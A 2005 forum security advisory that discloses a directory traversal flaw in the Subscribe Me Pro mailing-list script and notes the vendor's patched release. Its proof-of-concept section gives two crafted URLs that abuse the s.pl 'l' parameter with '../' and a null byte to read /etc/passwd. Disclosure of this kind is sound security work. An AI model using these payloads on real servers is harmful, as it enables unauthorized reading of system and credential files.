--------------------------------------------------------------
HYA-2005-006 h4cky0u.org Advisory 007
--------------------------------------------------------------
Date - Tue Sep 13 2005
TITLE:
======
Subscribe Me Pro 2.044.09P and prior Directory Traversal Vulnerability
SEVERITY:
=========
High
SOFTWARE:
=========
Subscribe Me Pro 2.044.09P and prior
Support Website : http://siteinteractive.com/subpro/
INFO:
=====
Subscribe Me Professional is designed to assist with the building, maintaining, mailing, and tracking of your customer/prospect mailing lists.
BUG DESCRIPTION:
================
Subscribe Me Pro 2.044.09P and prior are prone to a directory traversal vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An unauthorized user can retrieve arbitrary files by supplying directory traversal strings '../' to the vulnerable parameter.
POC:
====
Here are some examples:
www.site.com/[dir]/s.pl?e=1&subscribe=subscribe&l=../../../../../../../.
./etc/passwd%00&SUBMIT=%20%20Submit%20%20
www.site.com/[dir]/s.pl?e=enter%20your%20email%20address%20here&subscrib
e=subscribe&l=../../../../../../../../etc/passwd%00
VENDOR STATUS:
==============
Vendor Contact : 13th Sep 2005
Vendor Reply : 13th sep 2005 - This Vulnerability has been fixed in the Latest Release : 2.050.01P
FIX:
====
Upgrade to version 2.050.01P
CREDITS:
========
This vulnerability was discovered and researched by -
ShoCK FX of h4cky0u Security Forums.
mail : shockfx at gmail.com
web : http://www.h4cky0u.org
Co Researcher -
h4cky0u of h4cky0u Security Forums.
mail : h4cky0u at gmail.com
web : http://www.h4cky0u.org
ORIGINAL ADVISORY:
=================
http://www.h4cky0u.org/advisories/HYA-2005-007-subscribe-me-pro.txt
--
http://www.h4cky0u.org
(In)Security at its best...
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum